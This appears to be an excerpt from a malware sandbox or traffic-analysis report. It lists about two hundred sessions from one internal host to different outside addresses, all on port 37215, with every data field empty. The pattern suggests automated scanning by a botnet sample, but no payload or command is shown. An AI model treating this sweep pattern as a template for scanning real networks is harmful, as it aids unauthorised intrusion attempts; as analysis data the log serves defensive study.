                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7702192.168.2.1546014197.80.169.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7703192.168.2.1545884197.123.105.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7704192.168.2.1549368197.150.173.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7705192.168.2.1539096197.5.128.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7706192.168.2.1542600197.61.244.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7707192.168.2.1545802197.47.94.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7708192.168.2.1536064197.107.248.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7709192.168.2.1556304197.251.185.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7710192.168.2.1533464197.43.97.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7711192.168.2.1553062197.196.208.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7712192.168.2.1539282197.52.26.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7713192.168.2.1554462197.115.249.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7714192.168.2.1553476197.92.48.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7715192.168.2.1550610197.60.70.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7716192.168.2.1555064197.179.133.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7717192.168.2.1560170197.148.133.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7718192.168.2.1538094197.135.232.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7719192.168.2.1548966197.251.211.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7720192.168.2.1545900197.111.205.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7721192.168.2.1544232197.86.110.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7722192.168.2.1558616197.198.136.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7723192.168.2.1533976197.177.139.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7724192.168.2.1558738197.0.161.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7725192.168.2.1550378197.164.157.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7726192.168.2.1547652197.179.99.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7727192.168.2.1557062197.46.236.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7728192.168.2.1543076197.50.27.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7729192.168.2.1540012197.254.69.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7730192.168.2.1554386197.158.186.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7731192.168.2.1549062197.113.55.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7732192.168.2.1547824197.236.68.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7733192.168.2.1558616197.161.213.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7734192.168.2.1538830197.158.182.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7735192.168.2.1534226197.104.54.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7736192.168.2.1546930197.154.233.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7737192.168.2.1545920197.116.64.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7738192.168.2.1554780197.19.147.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7739192.168.2.1546184197.90.61.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7740192.168.2.1552684197.128.19.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7741192.168.2.1540070197.54.103.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7742192.168.2.1558146197.148.28.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7743192.168.2.1543016197.92.126.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7744192.168.2.1546080197.157.13.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7745192.168.2.1556894197.26.8.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7746192.168.2.1553946197.227.79.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7747192.168.2.1559654197.241.241.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7748192.168.2.1558442197.140.199.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7749192.168.2.1550318197.249.146.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7750192.168.2.1539522197.149.62.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7751192.168.2.1547630197.169.212.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7752192.168.2.1537140197.188.50.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7753192.168.2.1538618197.87.21.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7754192.168.2.1544748197.139.241.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7755192.168.2.1544894197.21.58.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7756192.168.2.155606041.197.249.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7757192.168.2.155668041.97.198.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7758192.168.2.153357241.117.181.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7759192.168.2.155664841.244.57.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7760192.168.2.155232041.189.129.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7761192.168.2.155073841.247.66.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7762192.168.2.156017641.157.99.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7763192.168.2.153836041.79.20.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7764192.168.2.154866041.87.27.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7765192.168.2.153851641.244.92.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7766192.168.2.155108041.45.107.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7767192.168.2.155257241.163.165.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7768192.168.2.154336841.182.157.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7769192.168.2.154280841.166.122.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7770192.168.2.154460841.221.134.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7771192.168.2.153504841.110.16.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7772192.168.2.153429441.51.97.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7773192.168.2.153409641.248.184.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7774192.168.2.155786841.102.0.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7775192.168.2.153586241.50.5.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7776192.168.2.153823841.133.87.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7777192.168.2.154110041.187.10.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7778192.168.2.155432841.6.237.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7779192.168.2.154779241.119.156.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7780192.168.2.154050641.12.123.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7781192.168.2.153546641.236.252.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7782192.168.2.155836841.87.105.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7783192.168.2.155719841.15.129.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7784192.168.2.153842641.28.242.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7785192.168.2.154585041.87.220.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7786192.168.2.155776841.221.248.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7787192.168.2.155513441.242.192.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7788192.168.2.154105841.149.239.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7789192.168.2.153305841.37.116.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7790192.168.2.155383041.238.129.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7791192.168.2.154848041.80.175.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7792192.168.2.155037841.49.2.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7793192.168.2.155496441.130.19.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7794192.168.2.155208641.55.234.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7795192.168.2.155425241.96.88.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7796192.168.2.155406241.229.135.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7797192.168.2.155701441.230.80.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7798192.168.2.153901441.109.247.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7799192.168.2.153614041.149.57.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7800192.168.2.154808441.110.83.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7801192.168.2.153939041.210.0.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7802192.168.2.155450641.95.0.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7803192.168.2.154620841.23.150.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7804192.168.2.153981041.139.242.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7805192.168.2.155015241.171.201.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7806192.168.2.153356241.14.163.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7807192.168.2.154046641.25.238.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7808192.168.2.154077241.78.238.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7809192.168.2.155097841.78.0.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7810192.168.2.155530841.254.245.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7811192.168.2.155128241.39.109.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7812192.168.2.154630241.228.76.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7813192.168.2.153858441.218.74.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7814192.168.2.155128241.45.189.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7815192.168.2.153468441.179.214.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7816192.168.2.156057441.97.247.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7817192.168.2.154563241.41.187.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7818192.168.2.155668441.186.172.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7819192.168.2.154957041.174.225.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7820192.168.2.155569641.212.39.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7821192.168.2.155352241.11.217.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7822192.168.2.153781441.51.205.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7823192.168.2.155298841.23.24.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7824192.168.2.154418641.252.107.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7825192.168.2.154317441.36.200.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7826192.168.2.154657041.10.74.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7827192.168.2.155593041.76.93.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7828192.168.2.155961241.233.110.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7829192.168.2.154102641.53.215.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7830192.168.2.154102441.189.35.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7831192.168.2.154903641.254.82.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7832192.168.2.153798441.252.27.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7833192.168.2.153904641.104.39.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7834192.168.2.153618841.30.189.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7835192.168.2.154079841.70.180.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7836192.168.2.154548841.152.63.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7837192.168.2.156097441.218.74.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7838192.168.2.155265241.137.10.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7839192.168.2.153987841.124.172.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7840192.168.2.153490841.61.219.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7841192.168.2.154189241.165.237.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7842192.168.2.155600241.176.76.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7843192.168.2.155658441.215.46.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7844192.168.2.154821441.98.88.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7845192.168.2.155117241.159.233.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7846192.168.2.154612841.53.108.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7847192.168.2.153407441.81.41.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7848192.168.2.155046041.143.138.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7849192.168.2.154871041.250.83.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7850192.168.2.155937041.187.79.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7851192.168.2.153449841.140.121.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7852192.168.2.154896041.249.112.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7853192.168.2.154469441.218.39.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7854192.168.2.154558641.206.131.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7855192.168.2.153729841.69.242.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7856192.168.2.155378241.84.179.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7857192.168.2.154852841.170.81.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7858192.168.2.155103841.126.49.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7859192.168.2.154204641.130.90.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7860192.168.2.155095641.109.161.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7861192.168.2.154769841.78.41.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7862192.168.2.153969241.83.105.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7863192.168.2.155434441.3.52.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7864192.168.2.154989641.90.60.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7865192.168.2.153773441.86.171.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7866192.168.2.155458441.209.237.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7867192.168.2.154868441.49.85.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7868192.168.2.154851241.99.35.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7869192.168.2.154734641.22.132.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7870192.168.2.153529841.245.10.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7871192.168.2.155240241.24.15.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7872192.168.2.155969841.11.33.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7873192.168.2.156099241.253.31.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7874192.168.2.153923841.234.153.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7875192.168.2.153456241.170.19.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7876192.168.2.153696841.139.59.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7877192.168.2.155291241.196.176.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7878192.168.2.154373841.35.17.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7879192.168.2.154029841.33.156.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7880192.168.2.156018841.86.212.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7881192.168.2.155789441.128.244.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7882192.168.2.155653041.49.79.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7883192.168.2.154352441.136.187.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7884192.168.2.154556041.167.176.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7885192.168.2.156001441.195.182.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7886192.168.2.155443241.60.31.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7887192.168.2.153735841.15.73.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7888192.168.2.155314841.125.11.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7889192.168.2.154057641.129.34.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7890192.168.2.154327241.201.35.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7891192.168.2.155691041.184.126.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7892192.168.2.154777241.251.187.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7893192.168.2.154611041.193.107.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7894192.168.2.155327241.81.16.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7895192.168.2.154420441.35.0.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7896192.168.2.155574841.191.116.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7897192.168.2.154879841.65.186.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7898192.168.2.154323841.33.14.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7899192.168.2.154975041.247.78.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7900192.168.2.153848041.161.44.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7901192.168.2.155584041.93.103.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7902192.168.2.154968041.151.18.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7903192.168.2.155218041.50.252.6937215
                                                                            TimestampBytes transferredDirectionData


